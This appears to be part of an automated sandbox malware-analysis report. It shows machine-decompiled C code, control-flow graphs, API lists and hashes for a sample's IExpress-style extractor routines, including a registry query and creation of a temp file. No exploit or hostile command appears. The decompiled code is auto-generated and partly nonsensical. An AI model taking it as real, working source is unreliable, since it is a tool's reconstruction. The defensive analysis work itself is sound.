                                                                                                                                                                                                                                            0x00a925d6
                                                                                                                                                                                                                                            0x00a925da
                                                                                                                                                                                                                                            0x00a925dd
                                                                                                                                                                                                                                            0x00a925dd
                                                                                                                                                                                                                                            0x00a925e3
                                                                                                                                                                                                                                            0x00a925e3
                                                                                                                                                                                                                                            0x00a925e3
                                                                                                                                                                                                                                            0x00a9258b
                                                                                                                                                                                                                                            0x00a92589
                                                                                                                                                                                                                                            0x00a9262f
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925B2
                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925CB
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,00A91ED3,00000001,00000000,?,?,00A94137,?,00A94096), ref: 00A925DD
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00A94096,00A94096,?,00A91ED3,00000001,00000000,?,?,00A94137,?), ref: 00A925FF
                                                                                                                                                                                                                                            • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00A94096,00000000,00000000,00000000,00000000,?,00A91ED3,00000001,00000000), ref: 00A9261A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager, xrefs: 00A925A8
                                                                                                                                                                                                                                            • PendingFileRenameOperations, xrefs: 00A925C3
                                                                                                                                                                                                                                            • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00A925F5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                            • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                            • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                            • Opcode ID: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                                                            • Instruction ID: 54a709df246bd31059a5b962e9fe98f772d57d76fb340c7e627776cedc40e960
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dc128831f1b6fded482514d9a9a9a0e890d1ee6d49d909b44c7e3342f3a608
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F114F35B42228BBAF20DB919C09EFBBEFCEF567A1F104056B909E2011DA345E45D7E1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 533 a96a60-a96a91 call a97155 call a97208 GetStartupInfoW 539 a96a93-a96aa2 533->539 540 a96abc-a96abe 539->540 541 a96aa4-a96aa6 539->541 544 a96abf-a96ac5 540->544 542 a96aa8-a96aad 541->542 543 a96aaf-a96aba Sleep 541->543 542->544 543->539 545 a96ad1-a96ad7 544->545 546 a96ac7-a96acf _amsg_exit 544->546 548 a96ad9-a96ae9 call a96c3f 545->548 549 a96b05 545->549 547 a96b0b-a96b11 546->547 550 a96b2e-a96b30 547->550 551 a96b13-a96b24 _initterm 547->551 555 a96aee-a96af2 548->555 549->547 553 a96b3b-a96b42 550->553 554 a96b32-a96b39 550->554 551->550 556 a96b44-a96b51 call a97060 553->556 557 a96b67-a96b71 553->557 554->553 555->547 558 a96af4-a96b00 555->558 556->557 566 a96b53-a96b65 556->566 560 a96b74-a96b79 557->560 561 a96c39-a96c3e call a9724d 558->561 564 a96b7b-a96b7d 560->564 565 a96bc5-a96bc8 560->565 570 a96b7f-a96b81 564->570 571 a96b94-a96b98 564->571 568 a96bca-a96bd3 565->568 569 a96bd6-a96be3 _ismbblead 565->569 566->557 568->569 575 a96be9-a96bed 569->575 576 a96be5-a96be6 569->576 570->565 572 a96b83-a96b85 570->572 573 a96b9a-a96b9e 571->573 574 a96ba0-a96ba2 571->574 572->571 577 a96b87-a96b8a 572->577 578 a96ba3-a96bbc call a92bfb 573->578 574->578 575->560 580 a96c1e-a96c25 575->580 576->575 577->571 581 a96b8c-a96b92 577->581 578->580 586 a96bbe-a96bbf exit 578->586 582 a96c32 580->582 583 a96c27-a96c2d _cexit 580->583 581->572 582->561 583->582 586->565
                                                                                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                                                                                            			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                            				signed int* _t25;
                                                                                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                                                                                            				signed char _t41;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                                            				signed int _t59;
                                                                                                                                                                                                                                            				intOrPtr* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t67;
                                                                                                                                                                                                                                            				void* _t68;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				E00A97155();
                                                                                                                                                                                                                                            				_push(0x58);
                                                                                                                                                                                                                                            				_push(0xa972b8);
                                                                                                                                                                                                                                            				E00A97208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                            				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                            				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                            				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                            				_t53 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                            					if(0 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(0 != _t56) {
                                                                                                                                                                                                                                            						Sleep(0x3e8);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t58 = 1;
                                                                                                                                                                                                                                            						_t53 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L7:
                                                                                                                                                                                                                                            					_t67 =  *0xa988b0 - _t58; // 0x2
                                                                                                                                                                                                                                            					if(_t67 != 0) {
                                                                                                                                                                                                                                            						__eflags =  *0xa988b0; // 0x2
                                                                                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                                                                                            							 *0xa981e4 = _t58;
                                                                                                                                                                                                                                            							goto L13;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa988b0 = _t58;
                                                                                                                                                                                                                                            							_t37 = E00A96C3F(0xa910b8, 0xa910c4); // executed
                                                                                                                                                                                                                                            							__eflags = _t37;
                                                                                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            								_t30 = 0xff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(0x1f);
                                                                                                                                                                                                                                            						L00A96FF4();
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t68 =  *0xa988b0 - _t58; // 0x2
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_push(0xa910b4);
                                                                                                                                                                                                                                            							_push(0xa910ac);
                                                                                                                                                                                                                                            							L00A97202();
                                                                                                                                                                                                                                            							 *0xa988b0 = 2;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if(_t53 == 0) {
                                                                                                                                                                                                                                            							 *0xa988ac = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t71 =  *0xa988b4;
                                                                                                                                                                                                                                            						if( *0xa988b4 != 0 && E00A97060(_t71, 0xa988b4) != 0) {
                                                                                                                                                                                                                                            							_t60 =  *0xa988b4; // 0x0
                                                                                                                                                                                                                                            							 *0xa9a288(0, 2, 0);
                                                                                                                                                                                                                                            							 *_t60();
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                            						_t59 =  *_t25;
                                                                                                                                                                                                                                            						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                            							_t41 =  *_t59;
                                                                                                                                                                                                                                            							if(_t41 > 0x20) {
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							if(_t41 != 0) {
                                                                                                                                                                                                                                            								if(_t54 != 0) {
                                                                                                                                                                                                                                            									goto L32;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                            										_t59 = _t59 + 1;
                                                                                                                                                                                                                                            										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            										_t41 =  *_t59;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                            							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t29 = 0xa;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push(_t29);
                                                                                                                                                                                                                                            							_t30 = E00A92BFB(0xa90000, 0, _t59); // executed
                                                                                                                                                                                                                                            							 *0xa981e0 = _t30;
                                                                                                                                                                                                                                            							__eflags =  *0xa981f8;
                                                                                                                                                                                                                                            							if( *0xa981f8 == 0) {
                                                                                                                                                                                                                                            								exit(_t30); // executed
                                                                                                                                                                                                                                            								goto L32;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							__eflags =  *0xa981e4;
                                                                                                                                                                                                                                            							if( *0xa981e4 == 0) {
                                                                                                                                                                                                                                            								__imp___cexit();
                                                                                                                                                                                                                                            								_t30 =  *0xa981e0; // 0x0
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                            							goto L40;
                                                                                                                                                                                                                                            							L32:
                                                                                                                                                                                                                                            							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                            							if(_t41 == 0x22) {
                                                                                                                                                                                                                                            								__eflags = _t54;
                                                                                                                                                                                                                                            								_t15 = _t54 == 0;
                                                                                                                                                                                                                                            								__eflags = _t15;
                                                                                                                                                                                                                                            								_t54 = 0 | _t15;
                                                                                                                                                                                                                                            								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                            							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                            							__eflags = _t26;
                                                                                                                                                                                                                                            							if(_t26 != 0) {
                                                                                                                                                                                                                                            								_t59 = _t59 + 1;
                                                                                                                                                                                                                                            								__eflags = _t59;
                                                                                                                                                                                                                                            								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t59 = _t59 + 1;
                                                                                                                                                                                                                                            							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L40:
                                                                                                                                                                                                                                            					return E00A9724D(_t30);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t58 = 1;
                                                                                                                                                                                                                                            				__eflags = 1;
                                                                                                                                                                                                                                            				goto L7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a96a60
                                                                                                                                                                                                                                            0x00a96a6a
                                                                                                                                                                                                                                            0x00a96a6c
                                                                                                                                                                                                                                            0x00a96a71
                                                                                                                                                                                                                                            0x00a96a78
                                                                                                                                                                                                                                            0x00a96a7f
                                                                                                                                                                                                                                            0x00a96a85
                                                                                                                                                                                                                                            0x00a96a8e
                                                                                                                                                                                                                                            0x00a96a91
                                                                                                                                                                                                                                            0x00a96a93
                                                                                                                                                                                                                                            0x00a96a9c
                                                                                                                                                                                                                                            0x00a96aa2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96aa6
                                                                                                                                                                                                                                            0x00a96ab4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96aa8
                                                                                                                                                                                                                                            0x00a96aaa
                                                                                                                                                                                                                                            0x00a96aab
                                                                                                                                                                                                                                            0x00a96aab
                                                                                                                                                                                                                                            0x00a96abf
                                                                                                                                                                                                                                            0x00a96abf
                                                                                                                                                                                                                                            0x00a96ac5
                                                                                                                                                                                                                                            0x00a96ad1
                                                                                                                                                                                                                                            0x00a96ad7
                                                                                                                                                                                                                                            0x00a96b05
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96ad9
                                                                                                                                                                                                                                            0x00a96ad9
                                                                                                                                                                                                                                            0x00a96ae9
                                                                                                                                                                                                                                            0x00a96af0
                                                                                                                                                                                                                                            0x00a96af2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96af4
                                                                                                                                                                                                                                            0x00a96af4
                                                                                                                                                                                                                                            0x00a96afb
                                                                                                                                                                                                                                            0x00a96afb
                                                                                                                                                                                                                                            0x00a96af2
                                                                                                                                                                                                                                            0x00a96ac7
                                                                                                                                                                                                                                            0x00a96ac7
                                                                                                                                                                                                                                            0x00a96ac9
                                                                                                                                                                                                                                            0x00a96b0b
                                                                                                                                                                                                                                            0x00a96b0b
                                                                                                                                                                                                                                            0x00a96b11
                                                                                                                                                                                                                                            0x00a96b13
                                                                                                                                                                                                                                            0x00a96b18
                                                                                                                                                                                                                                            0x00a96b1d
                                                                                                                                                                                                                                            0x00a96b24
                                                                                                                                                                                                                                            0x00a96b24
                                                                                                                                                                                                                                            0x00a96b30
                                                                                                                                                                                                                                            0x00a96b39
                                                                                                                                                                                                                                            0x00a96b39
                                                                                                                                                                                                                                            0x00a96b3b
                                                                                                                                                                                                                                            0x00a96b42
                                                                                                                                                                                                                                            0x00a96b57
                                                                                                                                                                                                                                            0x00a96b5f
                                                                                                                                                                                                                                            0x00a96b65
                                                                                                                                                                                                                                            0x00a96b65
                                                                                                                                                                                                                                            0x00a96b67
                                                                                                                                                                                                                                            0x00a96b6c
                                                                                                                                                                                                                                            0x00a96b6e
                                                                                                                                                                                                                                            0x00a96b71
                                                                                                                                                                                                                                            0x00a96b74
                                                                                                                                                                                                                                            0x00a96b74
                                                                                                                                                                                                                                            0x00a96b79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96b7d
                                                                                                                                                                                                                                            0x00a96b81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96b83
                                                                                                                                                                                                                                            0x00a96b8c
                                                                                                                                                                                                                                            0x00a96b8d
                                                                                                                                                                                                                                            0x00a96b90
                                                                                                                                                                                                                                            0x00a96b90
                                                                                                                                                                                                                                            0x00a96b83
                                                                                                                                                                                                                                            0x00a96b81
                                                                                                                                                                                                                                            0x00a96b94
                                                                                                                                                                                                                                            0x00a96b98
                                                                                                                                                                                                                                            0x00a96ba2
                                                                                                                                                                                                                                            0x00a96b9a
                                                                                                                                                                                                                                            0x00a96b9a
                                                                                                                                                                                                                                            0x00a96b9a
                                                                                                                                                                                                                                            0x00a96ba3
                                                                                                                                                                                                                                            0x00a96bab
                                                                                                                                                                                                                                            0x00a96bb0
                                                                                                                                                                                                                                            0x00a96bb5
                                                                                                                                                                                                                                            0x00a96bbc
                                                                                                                                                                                                                                            0x00a96bbf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96bbf
                                                                                                                                                                                                                                            0x00a96c1e
                                                                                                                                                                                                                                            0x00a96c25
                                                                                                                                                                                                                                            0x00a96c27
                                                                                                                                                                                                                                            0x00a96c2d
                                                                                                                                                                                                                                            0x00a96c2d
                                                                                                                                                                                                                                            0x00a96c32
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a96bc5
                                                                                                                                                                                                                                            0x00a96bc5
                                                                                                                                                                                                                                            0x00a96bc8
                                                                                                                                                                                                                                            0x00a96bcc
                                                                                                                                                                                                                                            0x00a96bce
                                                                                                                                                                                                                                            0x00a96bce
                                                                                                                                                                                                                                            0x00a96bd1
                                                                                                                                                                                                                                            0x00a96bd3
                                                                                                                                                                                                                                            0x00a96bd3
                                                                                                                                                                                                                                            0x00a96bd6
                                                                                                                                                                                                                                            0x00a96bda
                                                                                                                                                                                                                                            0x00a96be1
                                                                                                                                                                                                                                            0x00a96be3
                                                                                                                                                                                                                                            0x00a96be5
                                                                                                                                                                                                                                            0x00a96be5
                                                                                                                                                                                                                                            0x00a96be6
                                                                                                                                                                                                                                            0x00a96be6
                                                                                                                                                                                                                                            0x00a96be9
                                                                                                                                                                                                                                            0x00a96bea
                                                                                                                                                                                                                                            0x00a96bea
                                                                                                                                                                                                                                            0x00a96b74
                                                                                                                                                                                                                                            0x00a96c39
                                                                                                                                                                                                                                            0x00a96c3e
                                                                                                                                                                                                                                            0x00a96c3e
                                                                                                                                                                                                                                            0x00a96abe
                                                                                                                                                                                                                                            0x00a96abe
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A97182
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetCurrentProcessId.KERNEL32 ref: 00A97191
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetCurrentThreadId.KERNEL32 ref: 00A9719A
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: GetTickCount.KERNEL32 ref: 00A971A3
                                                                                                                                                                                                                                              • Part of subcall function 00A97155: QueryPerformanceCounter.KERNEL32(?), ref: 00A971B8
                                                                                                                                                                                                                                            • GetStartupInfoW.KERNEL32(?,00A972B8,00000058), ref: 00A96A7F
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 00A96AB4
                                                                                                                                                                                                                                            • _amsg_exit.MSVCRT ref: 00A96AC9
                                                                                                                                                                                                                                            • _initterm.MSVCRT ref: 00A96B1D
                                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00A96B49
                                                                                                                                                                                                                                            • exit.KERNELBASE ref: 00A96BBF
                                                                                                                                                                                                                                            • _ismbblead.MSVCRT ref: 00A96BDA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836923961-0
                                                                                                                                                                                                                                            • Opcode ID: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                                                            • Instruction ID: 8468f1fb4b00f8bc32ff58e64bbdb3b1cc3b45e0c69e0036a57ca973261bc289
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d190c5f7c09f693ec3dc25e9426cd619951a062ef5689110669add2940c30f1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2341E031B942259BDF21DBA8D9157AA77F4FF457A0F24411BE841E7290EF7848428BA0
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 587 a958c8-a958d5 588 a958d8-a958dd 587->588 588->588 589 a958df-a958f1 LocalAlloc 588->589 590 a95919-a95959 call a91680 call a9658a CreateFileA LocalFree 589->590 591 a958f3-a95901 call a944b9 589->591 595 a95906-a95910 call a96285 590->595 601 a9595b-a9596c CloseHandle GetFileAttributesA 590->601 591->595 600 a95912-a95918 595->600 601->595 602 a9596e-a95970 601->602 602->595 603 a95972-a9597b 602->603 603->600
                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A958C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				signed char _t16;
                                                                                                                                                                                                                                            				void* _t20;
                                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                                                                                            				CHAR* _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                                                                                            				_t27 = __ecx;
                                                                                                                                                                                                                                            				_t23 = __ecx + 1;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t6 =  *_t27;
                                                                                                                                                                                                                                            					_t27 = _t27 + 1;
                                                                                                                                                                                                                                            				} while (_t6 != 0);
                                                                                                                                                                                                                                            				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                            				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                            				if(_t20 != 0) {
                                                                                                                                                                                                                                            					E00A91680(_t20, _t36, _t33);
                                                                                                                                                                                                                                            					E00A9658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                            					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                            					_v8 = _t10;
                                                                                                                                                                                                                                            					LocalFree(_t20);
                                                                                                                                                                                                                                            					_t12 = _v8;
                                                                                                                                                                                                                                            					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L4;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						CloseHandle(_t12);
                                                                                                                                                                                                                                            						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                            						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							goto L4;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							_t14 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            					_t14 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t14;
                                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                                            0x00a958cd
                                                                                                                                                                                                                                            0x00a958d1
                                                                                                                                                                                                                                            0x00a958d3
                                                                                                                                                                                                                                            0x00a958d5
                                                                                                                                                                                                                                            0x00a958d8
                                                                                                                                                                                                                                            0x00a958d8
                                                                                                                                                                                                                                            0x00a958da
                                                                                                                                                                                                                                            0x00a958db
                                                                                                                                                                                                                                            0x00a958e1
                                                                                                                                                                                                                                            0x00a958ed
                                                                                                                                                                                                                                            0x00a958f1
                                                                                                                                                                                                                                            0x00a9591e
                                                                                                                                                                                                                                            0x00a9592c
                                                                                                                                                                                                                                            0x00a95943
                                                                                                                                                                                                                                            0x00a9594a
                                                                                                                                                                                                                                            0x00a9594d
                                                                                                                                                                                                                                            0x00a95953
                                                                                                                                                                                                                                            0x00a95959
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a9595b
                                                                                                                                                                                                                                            0x00a9595c
                                                                                                                                                                                                                                            0x00a95963
                                                                                                                                                                                                                                            0x00a9596c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95972
                                                                                                                                                                                                                                            0x00a95974
                                                                                                                                                                                                                                            0x00a9597a
                                                                                                                                                                                                                                            0x00a9597a
                                                                                                                                                                                                                                            0x00a9596c
                                                                                                                                                                                                                                            0x00a958f3
                                                                                                                                                                                                                                            0x00a95901
                                                                                                                                                                                                                                            0x00a95906
                                                                                                                                                                                                                                            0x00a9590b
                                                                                                                                                                                                                                            0x00a95910
                                                                                                                                                                                                                                            0x00a95910
                                                                                                                                                                                                                                            0x00a95918

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A958E7
                                                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95943
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9594D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A9595C
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A95534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A95963
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmpDownload File
